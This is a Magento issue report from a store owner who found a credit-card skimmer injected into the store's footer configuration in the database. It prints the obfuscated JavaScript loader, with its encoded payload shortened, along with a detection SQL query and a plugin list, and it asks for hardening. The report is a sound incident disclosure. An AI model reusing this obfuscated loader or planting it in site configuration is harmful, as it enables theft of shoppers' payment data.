Hacking attempt at Checkout Payment Method #40466
Description
Preconditions and environment
- Magento version
2.4.6 Community Edition - Anything else that would help a developer reproduce the bug
- No custom modifications to core_config_data write logic from my side
- Multiple store views configured (but not using them)
❗ Important: I’m reporting a potential security issue or hardening gap. I don’t know the original attack vector. I only discovered the payload after the compromised.
Steps to reproduce
What I can describe is what I observed:
- Notice an unknown credit-card payment method appearing on checkout on my production Magento 2.4 store.
- Investigate frontend output and find a large obfuscated <script> being printed in the footer on all pages.
- In the database, query core_config_data for footer / head content:
SELECT * FROM core_config_data WHERE path IN ('design/footer/absolute_footer', 'design/head/includes') OR value LIKE '%<script%Function(u83215)%';
- Find that for all store views, the path = 'design/footer/absolute_footer' contains the following script (shortened here):
<script> var j7239 = "{very long encoded string}"; var x20335 = 29; u83215 = j7239; r62571 = u83215.split("t30"), f19968 = parseInt(r62571[0], 29), l30111 = parseInt(r62571[1], 29); var o52799 = []; for (var p97949 = 0; p97949 < r62571[2].length; p97949 += 2) { o52799.push(r62571[2].substring(p97949, p97949 + 2)); } u83215 = ""; for (var i16491 = 0; o52799.length > i16491; i16491++) { u83215 += String.fromCharCode( ((parseInt(o52799[i16491], x20335) - f19968) ^ l30111) - f19968 ); } Function(u83215)["call"](); </script>
- Decoding this script (offline) reveals JavaScript that appears to hook into the checkout and inject/handle credit-card-related behavior (skimmer-style).
At this point I removed the script from core_config_data and disabled suspicious payment methods, so I cannot continue testing in a clean “lab” scenario.
Expected result
core_config_data entries such as design/footer/absolute_footer should not be silently modified by anything other than:
- explicit admin actions, or
- legitimate configuration deployment tools.
- Malicious/obfuscated payloads like this should not be able to:
- be injected without clear trace/logs, and/or
- persist undetected in theme configuration.
Ideally, Magento should provide:
- stronger hardening / logging / restrictions around HTML/JS in config values that are rendered globally (e.g. footer/head),
- or best-practice guidance/controls to limit arbitrary script injection in these config paths
Actual result
At some point (exact time unknown), a very large obfuscated JavaScript payload was written into core_config_data.value for path = 'design/footer/absolute_footer' for all store views.
This payload is decoded at runtime and executed via:
Function(u83215)["call"]();
While the root cause is unknown, the impact I observed:
- An unauthorized credit card payment method appeared on checkout.
- The obfuscated script appears to implement skimming behavior (capturing checkout/payment data and sending it externally).
- I did not manually add any JavaScript in footer/head config and no other admins report adding it.
This suggests either:
- an underlying vulnerability (in core, extension, or admin interface) that allowed arbitrary config write to core_config_data, or
- the need for additional security hardening or recommendations in Magento to:
- restrict/monitor script injection via design/footer/absolute_footer and similar paths,
- make it easier for store owners to detect and respond to such compromises.
Additional information
Script attached to this issue which the hacker has used or using continuously after every 2-3 days. I am just removing again n again for now and still trying to find a solution.
Magento version is 2.4.6 Community edition
I have quite alot of plugins installed:
Amasty (7)
- Amasty\Base
- Amasty\Geoip
- Amasty\GdprCookie
- Amasty\GdprFrontendUi
- Amasty\GdprLite
- Amasty\GdprLiteSubscriptionPackage
- Amasty\GoogleConsentMode
Fooman (2)
- Fooman\EmailAttachments
- Fooman\PrintOrderPdf
HK (1)
- HK\CustomSwatches
Kunstt (3)
- Kunstt\Content
- Kunstt\Csp
- Kunstt\Preventordertrojan
Mageants (1)
- Mageants\GiftCertificate
Magedelight (2)
- Magedelight\Base
- Magedelight\Ga4
Magefan (2)
- Magefan\Community
- Magefan\RocketJavaScript
Mageplaza (5)
- Mageplaza\AjaxLayer
- Mageplaza\Core
- Mageplaza\DeleteOrders
- Mageplaza\LayeredNavigation
- Mageplaza\Search
MageWorx (2)
- MageWorx\GiftCards
- MageWorx\Info
Magetrend (1)
- Magetrend\PdfTemplates
Magezon (2)
- Magezon\Core
- Magezon\LazyLoad
Magmodules (1)
- Magmodules\GoogleShopping
Magento (1)
- Magento\BundleConfig
Meetanshi (1)
- Meetanshi\CookieNotice
Mirasvit (4)
- Mirasvit\Core
- Mirasvit\Feed
- Mirasvit\Report
- Mirasvit\ReportApi
Smartwave (6)
- Smartwave\Core
- Smartwave\Dailydeals
- Smartwave\Filterproducts
- Smartwave\Megamenu
- Smartwave\Porto
- Smartwave\Socialfeeds
Tun2U (1)
- Tun2U\AutoRelated
Ulmod (1)
- Ulmod\AbsolutePricing
Although some of them are disabled and being used anymore
Release note
No response
Triage and priority
- Severity: S0 - Affects critical data or functionality and leaves users without workaround.
- Severity: S1 - Affects critical data or functionality and forces users to employ a workaround.
- Severity: S2 - Affects non-critical data or functionality and forces users to employ a workaround.
- Severity: S3 - Affects non-critical data or functionality and does not force users to employ a workaround.
- Severity: S4 - Affects aesthetics, professional look and feel, “quality” or “usability”.